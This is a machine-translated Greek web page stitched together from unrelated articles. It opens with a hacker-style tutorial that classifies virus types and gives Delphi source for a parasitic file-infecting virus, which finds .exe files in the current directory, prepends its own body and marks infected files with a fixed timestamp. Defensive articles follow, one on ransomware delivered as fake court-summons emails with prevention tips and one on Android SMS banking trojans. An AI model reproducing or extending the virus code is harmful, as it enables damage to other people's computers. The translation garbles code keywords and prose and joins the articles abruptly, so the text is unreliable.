Ταξινόμηση

HLLO- Αντικατάσταση γλώσσας υψηλού επιπέδου. Ένας τέτοιος ιός αντικαθιστά το πρόγραμμα με το σώμα του. Εκείνοι.
το πρόγραμμα καταστρέφεται και όταν ο χρήστης προσπαθεί να εκτελέσει το πρόγραμμα, ο ιός ξεκινά και «μολύνει» περαιτέρω.

HLLC - High Level Language Companion. Οι περισσότεροι από αυτούς τους ιούς χρονολογούνται από την αρχαιότητα (8-10 χρόνια πριν), όταν οι χρήστες είχαν DOS και ήταν πολύ τεμπέληδες. Αυτοί οι ιοί αναζητούν ένα αρχείο και, χωρίς να το αλλάξουν, δημιουργούν ένα αντίγραφο του εαυτού τους, αλλά με την επέκταση .COM. Εάν ένας τεμπέλης χρήστης γράψει στο γραμμή εντολώνμόνο το όνομα του αρχείου, μετά το DOS αναζητά πρώτα το αρχείο COM, εκκινώντας τον ιό, ο οποίος πρώτα κάνει τη δουλειά του και μετά εκκινεί το αρχείο EXE. Υπάρχει μια άλλη τροποποίηση
HLLC - πιο σύγχρονο (7 χρόνια;)): Ο ιός μετονομάζει το αρχείο, διατηρώντας το όνομα, αλλά αλλάζοντας την επέκταση - από EXE σε, ας πούμε, OBJ ή MAP. Ο ιός αντικαθιστά το αρχικό αρχείο με το σώμα του. Εκείνοι. ο χρήστης εκτοξεύει έναν ιό, ο οποίος, έχοντας πραγματοποιήσει την πράξη αναπαραγωγής, εκκινεί το επιθυμητό πρόγραμμα - όλοι είναι ευχαριστημένοι.

HLLP - High Level Language Parasitic. Το πιο εξελιγμένο. Αποδίδουν το σώμα τους στο αρχείο μπροστά (Ο ιός ξεκινά πρώτα, μετά επαναφέρει το πρόγραμμα και το εκτελεί) ή πίσω
- τότε στην κεφαλίδα του προγράμματος γράφουμε jmp near στο σώμα του ιού, μετά από όλα, ξεκινάει πρώτα.

Μπορούμε να αφήσουμε το ίδιο το πρόγραμμα αμετάβλητο, τότε θα μοιάζει με αυτό:

Τι είναι το MZ, νομίζω ότι το μαντέψατε 🙂 Αυτά είναι τα αρχικά του αγαπημένου σας Mark Zbikowski, τα οποία σεμνά προσδιόρισε ως υπογραφή αρχείο .exeα 🙂 Και τα μπήκα εδώ μόνο για να καταλάβετε
- η μόλυνση συμβαίνει σύμφωνα με την αρχή copy /b virus.exe program.exe και δεν υπάρχουν ειδικά αστεία εδώ. Οχι τώρα. Αλλά θα τα μαζέψουμε μαζί σου
- να είναι υγιής:). Λοιπόν, για παράδειγμα: μπορείτε να κρυπτογραφήσετε τα πρώτα 512 ή περισσότερα byte του αρχικού προγράμματος με οποιονδήποτε γνωστό σας αλγόριθμο - XOR/XOR, NOT/NOT, ADD/SUB, τότε θα μοιάζει με αυτό:

Σε αυτήν την περίπτωση, η δομή του μολυσμένου αρχείου δεν θα είναι τόσο σαφής.
Δεν είναι άδικο που είμαι εδώ (στην κατάταξη, με την έννοια) τόσο σταυρωμένος
- ο παρασιτικός αλγόριθμος χρησιμοποιείται κατά 90% σύγχρονους ιούς, ανεξάρτητα από τον τρόπο διανομής τους. Εντάξει, ας προχωρήσουμε:

ιός δικτύου. Μπορεί να είναι οποιοδήποτε από τα παραπάνω. Διαφέρει στο ότι η διανομή του δεν είναι
περιορισμένη σε έναν υπολογιστή, αυτή η μόλυνση με κάποιο τρόπο ανεβαίνει μέσω του Διαδικτύου ή τοπικό δίκτυοσε άλλα αυτοκίνητα. Νομίζω βγάζεις τακτικά 3-4 τέτοιους φίλους από τη σαπουνόκουτα
- εδώ είναι ένα παράδειγμα ιού δικτύου. Και μια φορά στον υπολογιστή κάποιου άλλου, μολύνει αρχεία με αυθαίρετο τρόπο ή δεν μολύνει ΚΑΘΟΛΟΥ.

Μακροϊοί, ιοί script, ιοί IRC. Τους έβαλα σε μια ομάδα επειδή είναι ιοί γραμμένοι σε γλώσσες ενσωματωμένες σε εφαρμογές (MSOffice :)), σενάρια (οι αγαπημένοι σας κανόνες VBS εδώ) και σενάρια IRC. Αυστηρά μιλώντας, μόλις εμφανιστεί ένα αρκετά ισχυρό (ή/και διαρροή) στοιχείο δέσμης ενεργειών σε κάποια εφαρμογή, αρχίζουν αμέσως να γράφουν ιούς σε αυτό 😉 Παρεμπιπτόντως, οι ιοί μακροεντολών είναι πολύ απλοί και ανιχνεύονται εύκολα από την ευρετική.

κωδικοποίηση

Το καταλάβαμε 🙂 Έλα, τρέξε τους delphi, σκότωσε κάθε λογής παράθυρα και σκουπίστε όλες τις ανοησίες από το παράθυρο του έργου. Δηλαδή, γενικά, σκουπίστε τα πάντα 🙂 Θα εργαστούμε μόνο με DPR που περιέχει:

πρόγραμμα EVIL_VIRUS?
ΧΡΗΣΙΜΟΠΟΙΕΙ ΠΑΡΑΘΥΡΑ, SYSUTILS;
να αρχίσει
τέλος;

Νομίζω ότι έχετε ήδη καταλάβει τη λογική του ιού από την ταξινόμηση - επαναφέρουμε και τρέχουμε το πρόγραμμα --> περιμένουμε να ολοκληρωθεί η εργασία του --> σβήνουμε το "εκτελεσμένο αρχείο" (ξέχασα να πω - ΔΕΝ ΘΕΡΑΠΕΥΟΥΜΕ το μολυσμένο πρόγραμμα, μεταφέρουμε τον αρχικό κώδικα στο αριστερό αρχείο και εκτελούμε ΠΑΡΑΔΕΙΓΜΑ: Μολυσμένο αρχείο NOTEPAD.EXE Δημιουργήστε το αρχείο _NOTEPAD.EXE στον ίδιο κατάλογο με τον αρχικό κώδικα και εκτελέστε τον ήδη).--> αναζητήστε μη μολυσμένο αρχείο αρχείο και μολύνει. Αυτό είναι όλο 🙂 Ο βασικός σχεδιασμός του ιού μοιάζει με αυτό.

Δηλώστε τώρα για τον ισχυρό εγκέφαλό σας τις ακόλουθες μεταβλητές και σταθερές:

VaR VirBuf, ProgBuf, MyBuf: πίνακας χαρακτήρων;
SR: TSearchRec;
My,pr: Αρχείο;
ProgSize, αποτέλεσμα: ακέραιος;
PN,st: String;
si:Tstartupinfo;
p:tπληροφορίες επεξεργασίας;
μολυσμένο: boolean;
CONST VirLen: longint= 1000000;

Η πρώτη γραμμή είναι δυναμικοί πίνακες, στους οποίους θα γράψουμε το σώμα του ιού και το πρόγραμμα, αντίστοιχα. Θα γραφεί η μεταβλητή SR
χαρακτηριστικά του αρχείου που βρέθηκε-υποψήφιος για μόλυνση (ελπίζω να είστε εξοικειωμένοι με τις διαδικασίες FindFirst και FindNext, γιατί θα χειροτερέψουν;)), My and
Το Pr είναι το αρχείο από το οποίο ξεκινήσαμε και το αριστερό αρχείο με τον αρχικό κώδικα του προγράμματος (έγραψα ήδη για αυτό παραπάνω). αποτέλεσμα - το αποτέλεσμα της λειτουργίας FindFirst, πρέπει να είναι ίσο με μηδέν,
ProgSize - μέγεθος κώδικα προγράμματος. Τα υπόλοιπα είναι ξεκάθαρα από όσα ακολουθούν, εκτός
μολυσμένο - αυτό είναι ένα σημάδι μόλυνσης του αρχείου που βρέθηκε και
Το VirLen είναι το μήκος του κωδικού του ιού, θα τον αναγνωρίσετε μόνο μετά το γάμο. Ουφ, ήθελα να πω μετά τη σύνταξη. Εκείνοι. μεταγλωττίζετε, αλλάζετε την τιμή της σταθεράς στον πηγαίο κώδικα και κάνετε εκ νέου μεταγλώττιση.
Κωδικός περαιτέρω 🙂 Εδώ μπορείτε να δείτε τον κώδικα που είναι υπεύθυνος για την επαναφορά και την εκτέλεση του μολυσμένου προγράμματος:

SetLength (virbuf, VirLen);
AssignFile(my,ParamStr(0));
st:=paramstr(0);
St:= st+#0;
CopyFile (@st,"c:\windows\program.exe",false);
IF FileSize(my)> VirLen τότε
να αρχίσει
//Εκκίνηση του προγράμματος
AssignFile(my,"c:\windows\program.exe);
επαναφορά (μου);
ProgSize:= FileSize(my)-VirLen;
BlockRead(my,virbuf,virlen);
SetLength(progbuf,pRogSize);
BlockRead(my,progbuf,progSize);
CloseFile(my);
PN:= "_"+ParamStr(0);
AssignFile(pr,pn);
ReWrite(pr);
BlockWrite (pr,progbuf,progSize);
CloseFile(pr);
FillChar(Si, SizeOf(Si) , 0);
με Si do
να αρχίσει
cb:= SizeOf(Si);
dwFlags:= startf_UseShowWindow;
wShowWindow:= 4;
τέλος;
PN:= PN+#0;
Createprocess(nil,@PN,nil,nil,false,Create_default_error_mode,nil,nil,si,p);
waitforsingleobject(p.hProcess,infinite);
//Έγινε έναρξη, το πρόγραμμα ολοκληρώθηκε. Ας το σβήσουμε 🙂
ErAsE(pr);
Erase(my);

Όλα εδώ, κατ 'αρχήν, είναι απλά και ξεκάθαρα, εκτός από το γιατί μετέφερα ολόκληρο το μολυσμένο αρχείο στον κατάλογο των Windows και τι κάνουν οι γραμμές από 3 έως 5, συμπεριλαμβανομένων.
Και το έκανα γιατί για να διαβάσω από τρέχον αρχείοάβολο και δυνατό μόνο με χρήση του CreateFile και του ReadFile WinAPI. Θα μιλήσω για την κωδικοποίηση στο WinAPI αργότερα, τώρα θα καλύψω μόνο τα βασικά
- στους Δελφούς.

Αυτές οι γραμμές είναι η μετατροπή της συμβολοσειράς σε pchar με λαϊκό τρόπο, αφού πλέον παλεύουμε για κάθε byte κώδικα. Ένα άλλο σημείο: Έκανα λάθος ορίζοντας τη διαδρομή c:\windows τόσο σκληρά. Χρησιμοποιήστε καλύτερα τη διαδικασία GetWindowsDirectory, μάθετε σίγουρα 🙂 Όλα τα άλλα είναι ξεκάθαρα χωρίς σχόλια (αν όχι
σταματήστε να παραλείπετε την πληροφορική;)), ας προχωρήσουμε:

αποτέλεσμα:= FindFirst("*.exe",faAnyFile,sr);
WHILE Αποτέλεσμα= 0 DO
να αρχίσει
// Έλεγχος για ψείρες
infected:= false;
IF DateTimeToStr (FileDateToDateTime (fileage (sr.name)))= "08/03/98 06:00:00" τότε infected:= true;
//Τετραγωνισμένος!
IF (infected= false)και (sr.name<>paramstr(0)) τότε
να αρχίσει
AssignFile(my,sr.Name);
ReWrite(my);
BlockWrite(my,virbuf,virlen);
BlockWrite(my,progbuf,sr.Size);
CloseFile(my);
FileSetDate (sr.Name,DateTimeToFileDate(StrToDateTime("08/03/98 06:00:00")));
τέλος;
τέλος;

//Εάν ο ιός λειτουργεί "καθαρός", π.χ. όχι από ένα μολυσμένο πρόγραμμα, μετά βγείτε
τέλος άλλο σταμάτημα?

Ποιο είναι το δικό σου οξυδερκές μάτιβλέπει εδώ; Σωστά, η διαδικασία FindFirst αναζητά ένα δεδομένο θύμα (οποιοδήποτε αρχείο exe από τον τρέχοντα κατάλογο), μεταφέρει τα χαρακτηριστικά του στη μεταβλητή SR. Στη συνέχεια, πρέπει να το ελέγξετε για μόλυνση. Αυτό γίνεται με έναν πρωτότυπο τρόπο: όταν έχει μολυνθεί, ένα αρχείο εκχωρείται ως def. ημερομηνία και ώρα. Και κάθε αρχείο με τέτοια χαρακτηριστικά θεωρείται μολυσμένο. Όλα τα άλλα είναι και πάλι άσεμνα απλά, οπότε προχωρώ ομαλά στο συμπέρασμα 🙂

συμπέρασμα

Έτσι έχουμε κωδικοποιήσει τον πρώτο μας ιό. Μέχρι στιγμής, μπορεί να μολύνει μόνο αρχεία στον τρέχοντα κατάλογο (αν και είμαι σίγουρος ότι μπορείτε εύκολα να τον αναβαθμίσετε;)) και δεν γνωρίζει τίποτα για άλλους καταλόγους και το Διαδίκτυο. Μην απελπίζεστε, θα τον βάλουμε σε λειτουργία σύντομα. Προς το παρόν, παίξτε με αυτές τις γραμμές και περιμένετε το επόμενο άρθρο.

Εφαρμογή

Θα τολμήσω να σας δώσω μια περιγραφή όλων των διαδικασιών που χρησιμοποιούνται στο άρθρο. Αυτό θα σας βοηθήσει να τα αναζητήσετε στη βοήθεια και να ετοιμαστείτε για την κωδικοποίηση σοβαρών ιών χρησιμοποιώντας
WinAPI.

Το AssignFile - δεν υπάρχει ανάλογο στο WinAPI - αντιστοιχίζει ένα αρχείο
Με μεταβλητή τύπουΑρχείο ή Αρχείο κειμένου

Επαναφορά - τα ανάλογα των _lopen και CreateFile - ανοίγει
υπάρχον αρχείο και ορίστε τη θέση
ανάγνωση κορυφή

ReWrite - _lcreate και CreateFile - δημιουργεί νέο αρχείοκαι
στόμα θέση ανάγνωσης στην αρχή. Αν τρέφονται
Ξαναγράψτε ένα υπάρχον αρχείο, τα περιεχόμενά του
θα γίνει επαναφορά

BlockRead - _lread και ReadFile - διαβάζει στο buffer
ορισμένη ποσότητα δεδομένων από ένα αρχείο

BlockWrite - _lwrite και WriteFile - αντίστοιχα, γράφει
δεδομένα σε αρχείο

SeekFile - _llseek και SetFilePointer - μετακίνηση θέσης
ανάγνωση/εγγραφή σε ανοιχτό αρχείο

CloseFile - _lclose και CloseHandle - κλείνει ένα άνοιγμα
αρχείο

Διαγραφή - Διαγραφή αρχείου - διαγραφή αρχείου

FindFirst - FindFirstFile - αναζήτηση για ένα αρχείο με κριτήρια

FindNext - FindNextFile - αναζήτηση για το επόμενο αρχείο

Καλέστε τον εξορκιστή admin παιδιά! Ο αρχιλογιστής κόλλησε έναν ισχυρό ιό, όλα έχουν φύγει! Μια συχνή, συχνή κατάσταση που βασίζεται στον ανθρώπινο παράγοντα, τις νέες τάσεις του ιού και την αποφασιστικότητα των χάκερ. Και πραγματικά, γιατί να ψάξετε μόνοι σας στο λογισμικό κάποιου άλλου, εάν μπορείτε να βασιστείτε στους υπαλλήλους της εταιρείας σε αυτό.

Ναι, τα προϊόντα μεγάλων δημόσιων και ιδιωτικών εταιρειών παραβιάζονται συνεχώς, αν και εκατοντάδες έμπειροι άνθρωποι εργάζονται για τη δημιουργία και την υποστήριξή τους.

Και ακόμη περισσότερο, ένας απλός άνθρωπος δεν έχει τίποτα να αντιτάξει στους χάκερ. Ταυτόχρονα, κανείς δεν χρειάζεται έναν μοναχικό λογαριασμό, ο στόχος των χάκερ είναι να αποκτήσουν μια μεγάλη βάση πιθανών θυμάτων και να την επεξεργαστούν με αλυσιδωτά γράμματα, ανεπιθύμητα μηνύματα ή ιούς. Και εμείς οι ίδιοι διανέμουμε όλες τις προσωπικές-δημόσιες πληροφορίες δεξιά και αριστερά.

Τελευταίες Viral Trends

Ένα ιδιαίτερο χαρακτηριστικό όλων των πρόσφατων ιών και τεχνικών hacking είναι ότι αλληλεπιδρούν με ένα άτομο, όχι με ένα σύστημα. Δηλαδή το ίδιο το θύμα ξεκινά τη διαδικασία. Ονομάζεται " κοινωνική μηχανική«- μέθοδος παράνομης πρόσβασης σε πληροφορίες, βασισμένη στα χαρακτηριστικά της ανθρώπινης ψυχολογίας. Και αν οι προηγούμενοι επιτιθέμενοι έπρεπε να μετατραπούν σε πραγματικούς ντετέκτιβ, να εντοπίσουν τους στόχους τους, να επικοινωνήσουν, μερικές φορές ακόμη και να βρουν δουλειά σε μια εταιρεία που έχει παραβιαστεί, τώρα μπορούμε να πούμε ευχαριστώ κοινωνικά δίκτυα. Απλοποίησαν και επιτάχυναν πολύ τη διαδικασία συλλογής πληροφοριών.

Περνώντας από το VK, το Twitter, το FB και το Instagram του στόχου σας, μπορείτε να λάβετε το ακριβές προφίλ ενός ατόμου με τον αριθμό τηλεφώνου, την αλληλογραφία, τα ονόματα γονέων, φίλων και άλλα στοιχεία. Και είναι όλα δωρεάν και εθελοντικά - χρησιμοποιήστε το, αγαπητέ!

Τι γίνεται αν οι απατεώνες αποκτήσουν πρόσβαση σε εταιρική αλληλογραφίαένας από τους υπαλλήλους σας, το spamming απειλεί όχι μόνο όλους μέσα στην εταιρεία, αλλά και τους πελάτες σας. Σε άλλη περίπτωση, οι χάκερ θα απενεργοποιήσουν τον υπολογιστή του υπαλλήλου για μεγάλο χρονικό διάστημα στέλνοντας κάποιου είδους «αναφορά» στο mail.

Οι χάκερ σχεδιάζουν επιθέσεις σε όσους εργάζονται με πολύτιμες πληροφορίες - γραμματείς, διευθυντές, λογιστές, HR.

Δεδομένου ότι η επαναφορά εγγράφων, συστημάτων, ιστότοπων ή η λήψη κωδικών πρόσβασης θα σας κοστίσει μια αρκετά δεκάραπρέπει να καταλάβουμε με τι έχουμε να κάνουμε. Για να μην μπορέσουν όλοι αυτοί οι «κοινωνικοί μηχανικοί» να σας κερδίσουν χρήματα, ας αναλύσουμε ένα από τα πιο πρόσφατα ιογενή σχήματα.

"Κρυπτιστές"

Ο ιός ransomware εξαπλώνεται ΗΛΕΚΤΡΟΝΙΚΗ ΔΙΕΥΘΥΝΣΗυπό το πρόσχημα σοβαρών εγγράφων: δικαστικές κλήσεις, τιμολόγια, αιτήματα από την εφορία. Και για να μην το εγκαταστήσετε μόνοι σας, πρέπει να κοιτάξετε και τις δύο κατευθύνσεις. Οι τεχνικοί μας ανέλυσαν ειδικά έναν τέτοιο ιό, ώστε να σας δείξουμε τι πρέπει να προσέξετε:

Ακολουθούμε τα χέρια αυτών των μάγων:

  • Απειλητικός τίτλος. «Ειδοποίηση για εμφάνιση στο δικαστήριο» σημαίνει «Κλήση στο Δικαστήριο». Τα παιδιά προσπαθούν να εκφοβίσουν και να αναγκάσουν τον χρήστη να ανοίξει την επιστολή.
  • Η διευθυνση του αποστολεα - [email προστατευμένο]Δείχνει ξεκάθαρα ότι δεν πρόκειται για επίσημη επιστολή, αλλά για spammer/hacker.
  • Αρχείο επιστολών. Υπάρχει ένα αρχείο εκεί που θα πρέπει να σας ειδοποιήσει αμέσως (το όνομα του αρχείου περιλαμβάνει .doc, αλλά την επέκταση js - ο ιός μεταμφιέζεται σε έγγραφο του Word)

Προσοχή!Εάν ο υπολογιστής είχε μολυνθεί με ransomware, τότε με πιθανότητα 95% οι πληροφορίες θα χαθούν για πάντα. Μετά τη λήψη και την εκκίνηση του κακόβουλου αρχείου, γίνεται μια κλήση σε έναν απομακρυσμένο διακομιστή από τον οποίο γίνεται λήψη του κωδικού ιού. Όλα τα δεδομένα στον υπολογιστή είναι κρυπτογραφημένα με μια τυχαία ακολουθία χαρακτήρων.

Για να «αποκωδικοποιήσετε» τα αρχεία, θα χρειαστείτε ένα κλειδί που έχει μόνο ένας χάκερ. Ο απατεώνας υπόσχεται να αποκρυπτογραφήσει τις πληροφορίες για ένα συγκεκριμένο ποσό, αλλά δεν είναι καθόλου βέβαιο ότι αυτό θα συμβεί. Για ποιο λόγο? Είναι πολύ πιο εύκολο να αφήσεις έναν άνθρωπο χωρίς χρήματα και χωρίς δεδομένα: συμβόλαια, πράξεις, παραγγελίες, οποιαδήποτε πολύτιμη και ευαίσθητη πληροφορία. Λοιπόν τι κάνεις αντίγραφα ασφαλείαςιδιαίτερα σημαντική τεκμηρίωση, θα κοιμάστε καλύτερα. Σε αυτήν την περίπτωση, αυτή είναι η μόνη σας 100% προστασία από ιούς.

Δώστε προσοχή στις παραπάνω δυνατότητες και θα μπορέσετε να αποτρέψετε επικίνδυνες περιπτώσεις αποκλεισμού υπολογιστών και διαγραφής σημαντικές πληροφορίες. Σε κάθε περίπτωση, η διόρθωση των συνεπειών των κρίσιμων τρωτών σημείων θα είναι πολύ πιο δαπανηρή από τη λήψη προφυλάξεων.

Ακολουθούν λοιπόν 6 ακόμη συμβουλές για τον εντοπισμό ιών και την πρόληψη της μόλυνσης:

1. Ενημερώνετε τακτικά το λειτουργικό σας σύστημα και τα προγράμματά σας.Σημαντικές ενημερώσεις που εγκαθίστανται αυτόματα από προεπιλογή μπορούν να απενεργοποιηθούν. Αλλά μην το κάνετε, επειδή οι νέες εκδόσεις συχνά κλείνουν τις ανακαλυφθείσες τρύπες στην ασφάλεια λογισμικού.

2. Εγκαταστήστε ένα πρόγραμμα προστασίας από ιούς και ενημερώστε τη βάση δεδομένων ιών τακτικά. Κάθε μέρα υπάρχουν 100 χιλιάδες νέοι ιοί!

3. Ενεργοποιήστε την εμφάνιση των επεκτάσεων αρχείων: Πίνακας Ελέγχου\Επιλογές φακέλου\Προβολή\Σύνθετες επιλογές, καταργήστε την επιλογή "Απόκρυψη επεκτάσεων για γνωστούς τύπους αρχείων" και κάντε κλικ στο OK. Με αυτόν τον τρόπο θα βλέπετε πάντα την πραγματική επέκταση αρχείου. Τις περισσότερες φορές, οι καλυμμένοι ιοί μοιάζουν με αυτό: filename.doc.js και filename.pdf.exe. Οι πραγματικές επεκτάσεις αρχείων είναι js και exe, και όλα πριν από αυτά αποτελούν μέρος του ονόματος αρχείου.

4. Δημιουργήστε αντίγραφα ασφαλείας των σημαντικών αρχείων σας - εγγράφων εργασίας και φωτογραφιών. Περιοδικότης Κρατήστε αντίγραφοπρέπει να επιλέξετε ανάλογα με τη συχνότητα των αλλαγών του αρχείου. Για αποθήκευση αντιγράφων ασφαλείας, μπορείτε να χρησιμοποιήσετε μια υπηρεσία cloud, εάν σας επιτρέπει να επιστρέψετε σε παλαιότερες εκδόσεις αρχείων και να ρυθμίσετε τον μη αυτόματο συγχρονισμό. Στη συνέχεια, σε περίπτωση μόλυνσης υπολογιστή, ο ιός δεν θα εισέλθει στο cloud. Σας συνιστούμε επίσης να διατηρείτε ένα αντίγραφο των σημαντικών δεδομένων σας σε ένα αρχείο.Οι περισσότεροι ιοί δεν μπορούν να διεισδύσουν στο αρχείο και όλες οι αρχειοθετημένες πληροφορίες αποκαθίστανται μετά την απολύμανση του υπολογιστή.

5. Αυξήστε τον επαγγελματικό γραμματισμό των ειδικών σας!Όπως έχουμε ήδη πει, οι χάκερ προσαρμόζουν τις επιθέσεις τους στην ψυχολογία μας και βελτιώνουν συνεχώς τις τεχνικές τους. Μην περιμένετε από κανέναν άλλον εκτός από την εταιρεία και την ομάδα σας να κάνει κλικ/ανεβάσει/εισάγει τα δεδομένα σας. Οποιοσδήποτε μπορεί να πιαστεί, το καθήκον είναι μόνο να επιλέξετε το σωστό γάντζο για ένα άτομο. Επομένως, εκπαιδεύστε τους υπαλλήλους σας, τουλάχιστον ατομικά, τουλάχιστον ομαδικά, τουλάχιστον με παιχνιδιάρικο τρόπο, τουλάχιστον με κάποιο τρόπο!

6. Παρακολουθήστε στενά τις επιστολές στο ταχυδρομείο, τα μηνύματα σε εταιρικούς αγγελιοφόρους και οποιεσδήποτε άλλες εισερχόμενες πληροφορίες. Ελέγξτε τις διευθύνσεις email, τα συνημμένα και το περιεχόμενο email των αποστολέων. Οι περισσότεροι ιοί πρέπει να εκτελούνται χειροκίνητα για να μπορέσουν να βλάψουν τον υπολογιστή σας.

Ελπίζουμε πραγματικά ότι διαβάζετε αυτό το άρθρο για μια προεπισκόπηση και όχι επειδή όλα είναι ήδη άσχημα. Σας ευχόμαστε να μην αντιμετωπίσετε ποτέ εντελώς ανεξέλεγκτα ανεπιθύμητα μηνύματα, έλλειψη τεκμηρίωσης για έξι μήνες και άλλες ευχάριστες συνέπειες από ιούς που έχουν συλληφθεί. Ακολουθήστε τα έξι παραπάνω βήματα, κρατήστε τα μάτια σας ανοιχτά και κρατήστε τις πληροφορίες σας απόρρητες!

Οι χρήστες δεν είναι πάντα σε θέση να αναγνωρίσουν έναν ιό στο κινητό τους τηλέφωνο και, κατά συνέπεια, δεν είναι δυνατό να διαγράψουν το κακόβουλο πρόγραμμα ή να προβούν σε οποιαδήποτε ενέργεια προτού ο ιός αποκτήσει πρόσβαση στα προσωπικά δεδομένα.

Στο αυτή τη στιγμήΤα smartphone Android θεωρούνται τα πιο ευάλωτα. Ένας νέος ιός εμφανίστηκε μέσω SMS στο Android.

Σε smartphone με ανοιχτή πηγή, που στην πραγματικότητα είναι λειτουργικό σύστημα Android, νέοι ιοί εξαπλώνονται με απίστευτο ρυθμό.

Τώρα έχουν αλλάξει. Παλαιότερα προσπαθούσαν να χρησιμοποιήσουν χρήματα μόνο σε κινητά τηλέφωνα, αλλά σήμερα είναι υπό το όπλο τραπεζικές κάρτεςκαι όλα τα κεφάλαια που βρίσκονται στην Internet Bank. Οι απατεώνες ενδιαφέρονται κυρίως για smartphone που υποστηρίζουν την υπηρεσία Mobile Bank. Σας επιτρέπει να κλέψετε χρήματα από τον λογαριασμό του θύματος στον αριθμό του απατεώνα. Για να γίνει αυτό, στέλνουν έναν ιό μέσω SMS στο Android.

Πώς λειτουργούν οι απατεώνες

Ο πρώτος τέτοιος ιός έγινε ενεργός στις αρχές του καλοκαιριού του 2017. Ο κίνδυνος είναι ότι το Trojan λειτουργεί εξ αποστάσεως σε smartphone Android.

Οι επιτιθέμενοι στέλνουν SMS στον επιθυμητό αριθμό, επομένως, για να εντοπίσουν την παρουσία αυτού του ιού στο κινητό τους gadget, οι κάτοχοι smartphone θα πρέπει να δώσουν προσοχή στην αύξηση του αριθμού των μηνυμάτων SMS αξίας 100 ρούβλια το καθένα. Ως αποτέλεσμα, ένα ποσό που είναι πολλαπλάσιο του 100 αποσύρεται από τον λογαριασμό κινητού του κατόχου του smartphone.

Για να κερδίσει σημαντικά χρήματα, ο εισβολέας αναγκάζεται να στείλει αρκετούς Trojans SMS από τον αριθμό του θύματός του. Άλλωστε, δεν είναι ο μόνος που εργάζεται σε αυτή τη δόλια αλυσίδα.

Ο Trojan κατοικεί στο gadget του θύματος και στέλνει μηνύματα SMS από τον αριθμό του θύματος στον "ακριβό" αριθμό των απατεώνων. Και είναι για αυτά τα μηνύματα SMS που απευθύνονται σε αυτόν τον "ακριβό" αριθμό που το θύμα χρεώνεται 100 ρούβλια το καθένα. για κάθε μη εξουσιοδοτημένο μήνυμα SMS.

Διαμεσολαβητές σε αυτό το σχήμα μπορεί να είναι ένας πάροχος τηλεπικοινωνιών, ένας πάροχος και άλλοι συνεργάτες που μπορεί να μην γνωρίζουν για τα κόλπα των απατεώνων. Για να καλύψει όλα τα έξοδα και να κερδίσει χρήματα, ο εισβολέας πρέπει να αποσύρει τουλάχιστον 1.000 ρούβλια από κάθε αριθμό.

Ταυτόχρονα, δεν μπορεί να αποκλειστεί το ενδεχόμενο οι κάτοχοι smartphone να παραπονεθούν στον χειριστή τους για κλοπή χρημάτων. Και μετά παίρνουν αντίποινα που αποτρέπουν την απάτη. Για παράδειγμα, μπορούν να εισάγουν μια απαιτούμενη είσοδο πρόσθετη επιβεβαίωσηπριν χρεώσεις χρήματα κ.λπ. Σε μια τέτοια κατάσταση, οι επιτιθέμενοι αναγκάζονται να αναζητήσουν νέους τρόπους απάτης.

Χάρη σε αυτούς τους παράγοντες, εμφανίστηκε ένας άλλος Trojan. Αυτός ο εκπρόσωπος του Trojan-SMS εκτελεί επίσης εντολές από έναν απομακρυσμένο διακομιστή.

Νέος ιόςείναι πιο ευέλικτο και απόλυτα προσανατολισμένο σε οποιεσδήποτε συνθήκες λαμβάνοντας ήδη υπόψη τα εμπόδια φορέας κινητής τηλεφωνίας, ακόμη και την κατάσταση του λογαριασμού του συνδρομητή και την ώρα των συναλλαγών.

Πώς λειτουργεί ο ιός

Ο νέος ιός είναι αδρανής - δεν έχει ανεξαρτησία. Ακόμη και μια φορά στο smartphone, δεν εμφανίζεται με κανέναν τρόπο. Χρειάζεται μια απομακρυσμένη εντολή από τον κάτοχο του τηλεφώνου για να λειτουργήσει.

Για αυτό, χρησιμοποιείται το λεγόμενο αίτημα POST. Προορίζεται για ένα αίτημα στο οποίο ο διακομιστής Ιστού δέχεται για αποθήκευση τα δεδομένα που περικλείονται στο σώμα του μηνύματος. Χρησιμοποιείται συχνά, για παράδειγμα, για τη λήψη ενός αρχείου.

Η χρήση ενός αιτήματος POST σάς επιτρέπει να συνδεθείτε με απομακρυσμένος διακομιστήςκαι να λάβει την κατάλληλη εντολή, με τη λήψη της οποίας ο Trojan αρχίζει να στέλνει ακριβά μηνύματα SMS από τους αριθμούς των θυμάτων του στους αριθμούς των απατεώνων.

Πώς λειτουργεί το νέο Trojan; Για παράδειγμα, το πρόγραμμα στέλνει αυτόματα μηνύματα SMS με μία λέξη "BALANCE" σε έναν αριθμό που υποστηρίζει "Mobile Banking".

Αποστολή μηνύματος SMS γ σύντομος αριθμός, οι απατεώνες μπορούν έτσι να ελέγξουν εάν ο αριθμός του θύματος είναι συνδεδεμένος με έναν τραπεζικό λογαριασμό και ποια είναι η κατάσταση του λογαριασμού.

Παραδείγματα πραγματικής ζωής

Για παράδειγμα, η Sberbank έχει τον αριθμό από τον οποίο αποστέλλονται τα μηνύματα - 900. Όταν το μήνυμα "BALANCE" (ή, ενδεχομένως, στα ρωσικά "υπόλοιπο") προέρχεται από τον αποστολέα 900, τότε ο κάτοχος του τηλεφώνου, εμπιστεύεται τη Sberbank και είναι σίγουρος ότι αυτό το μήνυμα είναι από αυτήν την τράπεζα, ανοίγει το μήνυμα και απαντά σε αυτό, θέλοντας να μάθει τι συνέβη με το υπόλοιπο. Έτσι, οι απατεώνες λαμβάνουν απάντηση στα SMS τους, κάτι που για αυτούς σημαίνει ότι α κάρτα τράπεζας. Επιπλέον, τους γίνεται σαφές ότι η κάρτα αυτή μπορεί να ελεγχθεί με εντολές SMS, οι οποίες περιλαμβάνονται στην υπηρεσία Mobile Banking. Και μετά, όπως λένε, «θέμα τεχνολογίας».

Ένας από τους φίλους μου έλαβε πρόσφατα μηνύματα από τον σύντομο αριθμό 4-74-1, ο οποίος είναι εγγεγραμμένος στην κινητή τράπεζα της Sberbank με το μήνυμα "Η υπηρεσία δεν είναι διαθέσιμη, δοκιμάστε ξανά αργότερα". Για ευνόητους λόγους, δεν έστειλε απάντηση, γνωρίζοντας ήδη για πιθανές απειλές. Προφανώς, πρόκειται για τους ίδιους απατεώνες, που μεταμφιέζονται σε mobile bank, που προσπαθούν να υπολογίσουν την αντίδρασή της με αυτόν τον τρόπο και να προσδιορίσουν αν έχει εγκατασταθεί mobile bank στο smartphone της.